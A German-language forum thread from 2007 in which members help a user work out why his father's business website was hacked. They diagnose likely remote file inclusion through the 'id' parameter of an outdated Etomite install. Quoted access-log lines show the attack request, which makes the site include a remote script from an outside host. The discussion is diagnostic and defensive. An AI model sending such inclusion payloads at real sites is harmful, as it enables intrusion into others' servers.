website gehackt/server spezis gefragt...

k3nny_gat

Bloody Newbie

Registered: Dec 2006
Location: vienna
Posts: 6

17.10.2007 - 09:46

hallo liebe oc-community!
hab folgendes problem schon im g.at-forum gepostet, aber du wurde mir nicht so recht geholfen und der tipp gegeben es einmal hier zu versuchen.

die webseite meines vaters war jetzt für ein paar tage nicht erreichbar. auf anfrage beim host bekam er die melung zurück, die website sei gehackt worden plus text-schnippsel aus einem log-file.

weiters meinte man, sollte diese sicherheitslücke von meinem vater nicht behoben werden, werde die seite wieder gesperrt.

hier das log:

quote: /home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - -
[08/Sep/2007:12:21:19 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
/home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - -
[08/Sep/2007:12:21:32 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"
/home/diabolo/logs/transfer.log:189-19-21-18.dsl.telesp.net.br - -
[08/Sep/2007:12:51:24 +0200] "GET
/index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.0" 302 0 "-"
"Wget/1.1 (compatible; i486; Linux; RedHat6.3)"

meine frage ist jetzt:
ich weiß jetzt nicht 100% wie das bei meinem vater abläuft, aber er ist definitiv kein webadmin, er lädt die sachen nur rauf. wie soll also er eine sicherheitslücke schließen, die eigentlich der host und eigentliche serveradmin beheben sollte?

bzw. kann wer aus dem log-ausschnitt wirklich erkennen um was für einen "hack" es sich handelt?

HowlingWolf

...

Registered: Jul 2001
Location: 2340
Posts: 1314

17.10.2007 - 09:51

Ok was für ne Seite ist das eigentlich von deinem Vater?
Verwendet er irgendwelche Datenbanken? Ists ein Forum? Ein Blog? Welche Software läuft drauf?

COLOSSUS

Administrator
Frickler

Registered: Dec 2000
Location: ~
Posts: 11928

17.10.2007 - 09:52

Das einzige, was ich mir aufgrund der wirklich spaerlichen Information vorstellen koennte ist, dass eure Webapplikation ueber den GET-Parameter "id" remote file inclusion zulaesst. Ein wget-Useragent allein (auch von einem uralt-Red-Hat) ist jedenfalls noch nicht Verdachtsmoment genug...

Welche Webapplikation laeuft denn auf eurem Webspace?

BobbyPI

jiu-jitsu rulez... ;)

Registered: Nov 2001
Location: Vienna
Posts: 721

17.10.2007 - 09:52

URL? /e. Rest wurde schon gesagt..

k3nny_gat

Bloody Newbie

Registered: Dec 2006
Location: vienna
Posts: 6

17.10.2007 - 09:57

pf. ihr überhäufts mich mit fragen. ;p

ich hab ehrlich gesagt keine ahnung. ist die website zum geschäft meines vaters und ich hatte mit derer administration noch nichts am hut. dass über die url code ausgeführt/oder, zweiter gedanke, der server einfach nur zugemüllt wird, war auch mein erster gedanke. aber da ich nicht regelmäßig mit httpds arbeite fehlt mir da einfach die erfahrung.

es kommt mir aber immer mehr der verdacht, dass für die behebung dieses fehlers nicht mein vater sondern der wirkliche host selbst verantwortlich ist...

Umlüx

Huge Metal Fan

Registered: Jun 2001
Location: Kärnten
Posts: 8906

17.10.2007 - 09:59

denke auch es wird das von colossus beschriebene problem sein. die laden über den parameter ID eine externe webseite rein die sonst was macht. direkte includes in php sind böse..

HowlingWolf

...

Registered: Jul 2001
Location: 2340
Posts: 1314

17.10.2007 - 10:00

Hmm es kann sein dass eine alte PHP Version auf diesem Host installiert ist... Oder wie Colossus schon geschrieben hat eine File inclusion bei einer Abfrage möglich ist ... Selbst geschriebene Software?

Ohne mehr Informationen wirst keine detailiertere Antwort bekommen. Tut mir leid.

BobbyPI

jiu-jitsu rulez... ;)

Registered: Nov 2001
Location: Vienna
Posts: 721

17.10.2007 - 10:06

Ist die Webseitenadresse geheim? Ansonsten poste sie mal, vielleicht können wir dir dann mehr sagen...

Lg,

Robert

H.E.N.K

iam a l4hm3 nubi © DAO

Registered: Oct 2000
Location: Wien
Posts: 2706

17.10.2007 - 10:08

Falls du Literatur benötigst um etwaige Sicherheitslücken -in der PHP application- zu stopfen :

PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren
# ISBN-10: 3898644502
# ISBN-13: 978-3898644501

Gibt einen recht guten Überblick

Der Rest wurde imo schon gesagt/gefragt

k3nny_gat

Bloody Newbie

Registered: Dec 2006
Location: vienna
Posts: 6

17.10.2007 - 10:49

website ist diabolo.at

rettich

Legend
waffle, waffle!

Registered: Jan 2004
Location: wien
Posts: 794

17.10.2007 - 11:04

welche version von etomite ist denn drauf?

zB
http://secunia.com/advisories/18556/

wenn man im google nach

"GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt?"

sucht, findet man zahlreiche einträge. dürfte ein recht beliebter exploit von anfälliger PHP software sein (php securemode=off?)

Bearbeitet von rettich am 17.10.2007, 11:13

HowlingWolf

...

Registered: Jul 2001
Location: 2340
Posts: 1314

17.10.2007 - 11:14

[OT]

Zitat von k3nny_gat
website ist diabolo.at

Das ist dein Vater? Sagst ihm danke für die Smilies auf der Rechnung

[/OT]

Wenns PHP Secure Mode OFF ist dann ists ein Problem des Providers...

Wie man der von rettich geposteten Security Bulletin entnehmen kann gibts eh einen Etomite Patch der das Problem beseitigen sollte.
Zeit für ein Software Update?

Bearbeitet von HowlingWolf am 17.10.2007, 11:17

k3nny_gat

Bloody Newbie

Registered: Dec 2006
Location: vienna
Posts: 6

17.10.2007 - 15:24

wtf smilies auf der rechnung?!

k3nny_gat Bloody Newbie Registered: Dec 2006 Location: vienna Posts: 6	17.10.2007 - 09:46 hallo liebe oc-community! hab folgendes problem schon im g.at-forum gepostet, aber du wurde mir nicht so recht geholfen und der tipp gegeben es einmal hier zu versuchen. die webseite meines vaters war jetzt für ein paar tage nicht erreichbar. auf anfrage beim host bekam er die melung zurück, die website sei gehackt worden plus text-schnippsel aus einem log-file. weiters meinte man, sollte diese sicherheitslücke von meinem vater nicht behoben werden, werde die seite wieder gesperrt. hier das log: quote: /home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - - [08/Sep/2007:12:21:19 +0200] "GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-" "Wget/1.1 (compatible; i486; Linux; RedHat6.3)" /home/diabolo/logs/transfer.log:c952351e.cps.virtua.com.br - - [08/Sep/2007:12:21:32 +0200] "GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.1" 302 5 "-" "Wget/1.1 (compatible; i486; Linux; RedHat6.3)" /home/diabolo/logs/transfer.log:189-19-21-18.dsl.telesp.net.br - - [08/Sep/2007:12:51:24 +0200] "GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt? HTTP/1.0" 302 0 "-" "Wget/1.1 (compatible; i486; Linux; RedHat6.3)" meine frage ist jetzt: ich weiß jetzt nicht 100% wie das bei meinem vater abläuft, aber er ist definitiv kein webadmin, er lädt die sachen nur rauf. wie soll also er eine sicherheitslücke schließen, die eigentlich der host und eigentliche serveradmin beheben sollte? bzw. kann wer aus dem log-ausschnitt wirklich erkennen um was für einen "hack" es sich handelt?
HowlingWolf ... Registered: Jul 2001 Location: 2340 Posts: 1314	17.10.2007 - 09:51 Ok was für ne Seite ist das eigentlich von deinem Vater? Verwendet er irgendwelche Datenbanken? Ists ein Forum? Ein Blog? Welche Software läuft drauf?
COLOSSUS Administrator Frickler Registered: Dec 2000 Location: ~ Posts: 11928	17.10.2007 - 09:52 Das einzige, was ich mir aufgrund der wirklich spaerlichen Information vorstellen koennte ist, dass eure Webapplikation ueber den GET-Parameter "id" remote file inclusion zulaesst. Ein wget-Useragent allein (auch von einem uralt-Red-Hat) ist jedenfalls noch nicht Verdachtsmoment genug... Welche Webapplikation laeuft denn auf eurem Webspace?
BobbyPI jiu-jitsu rulez... ;) Registered: Nov 2001 Location: Vienna Posts: 721	17.10.2007 - 09:52 URL? /e. Rest wurde schon gesagt..
k3nny_gat Bloody Newbie Registered: Dec 2006 Location: vienna Posts: 6	17.10.2007 - 09:57 pf. ihr überhäufts mich mit fragen. ;p ich hab ehrlich gesagt keine ahnung. ist die website zum geschäft meines vaters und ich hatte mit derer administration noch nichts am hut. dass über die url code ausgeführt/oder, zweiter gedanke, der server einfach nur zugemüllt wird, war auch mein erster gedanke. aber da ich nicht regelmäßig mit httpds arbeite fehlt mir da einfach die erfahrung. es kommt mir aber immer mehr der verdacht, dass für die behebung dieses fehlers nicht mein vater sondern der wirkliche host selbst verantwortlich ist...
Umlüx Huge Metal Fan Registered: Jun 2001 Location: Kärnten Posts: 8906	17.10.2007 - 09:59 denke auch es wird das von colossus beschriebene problem sein. die laden über den parameter ID eine externe webseite rein die sonst was macht. direkte includes in php sind böse..
HowlingWolf ... Registered: Jul 2001 Location: 2340 Posts: 1314	17.10.2007 - 10:00 Hmm es kann sein dass eine alte PHP Version auf diesem Host installiert ist... Oder wie Colossus schon geschrieben hat eine File inclusion bei einer Abfrage möglich ist ... Selbst geschriebene Software? Ohne mehr Informationen wirst keine detailiertere Antwort bekommen. Tut mir leid.
BobbyPI jiu-jitsu rulez... ;) Registered: Nov 2001 Location: Vienna Posts: 721	17.10.2007 - 10:06 Ist die Webseitenadresse geheim? Ansonsten poste sie mal, vielleicht können wir dir dann mehr sagen... Lg, Robert
H.E.N.K iam a l4hm3 nubi © DAO Registered: Oct 2000 Location: Wien Posts: 2706	17.10.2007 - 10:08 Falls du Literatur benötigst um etwaige Sicherheitslücken -in der PHP application- zu stopfen : PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren # ISBN-10: 3898644502 # ISBN-13: 978-3898644501 Gibt einen recht guten Überblick Der Rest wurde imo schon gesagt/gefragt
k3nny_gat Bloody Newbie Registered: Dec 2006 Location: vienna Posts: 6	17.10.2007 - 10:49 website ist diabolo.at
rettich Legend waffle, waffle! Registered: Jan 2004 Location: wien Posts: 794	17.10.2007 - 11:04 welche version von etomite ist denn drauf? zB http://secunia.com/advisories/18556/ wenn man im google nach "GET /index.php?id=http://0x00013.50webs.org/tesgcc.txt?" sucht, findet man zahlreiche einträge. dürfte ein recht beliebter exploit von anfälliger PHP software sein (php securemode=off?) Bearbeitet von rettich am 17.10.2007, 11:13
HowlingWolf ... Registered: Jul 2001 Location: 2340 Posts: 1314	17.10.2007 - 11:14 [OT] Zitat von k3nny_gat website ist diabolo.at Das ist dein Vater? Sagst ihm danke für die Smilies auf der Rechnung [/OT] Wenns PHP Secure Mode OFF ist dann ists ein Problem des Providers... Wie man der von rettich geposteten Security Bulletin entnehmen kann gibts eh einen Etomite Patch der das Problem beseitigen sollte. Zeit für ein Software Update? Bearbeitet von HowlingWolf am 17.10.2007, 11:17
k3nny_gat Bloody Newbie Registered: Dec 2006 Location: vienna Posts: 6	17.10.2007 - 15:24 wtf smilies auf der rechnung?!

website gehackt/server spezis gefragt...

Forum Index > Software > Applications, Apps & Drivers

k3nny_gat

HowlingWolf

COLOSSUS

BobbyPI

k3nny_gat

Umlüx

HowlingWolf

BobbyPI

H.E.N.K

k3nny_gat

rettich

HowlingWolf

k3nny_gat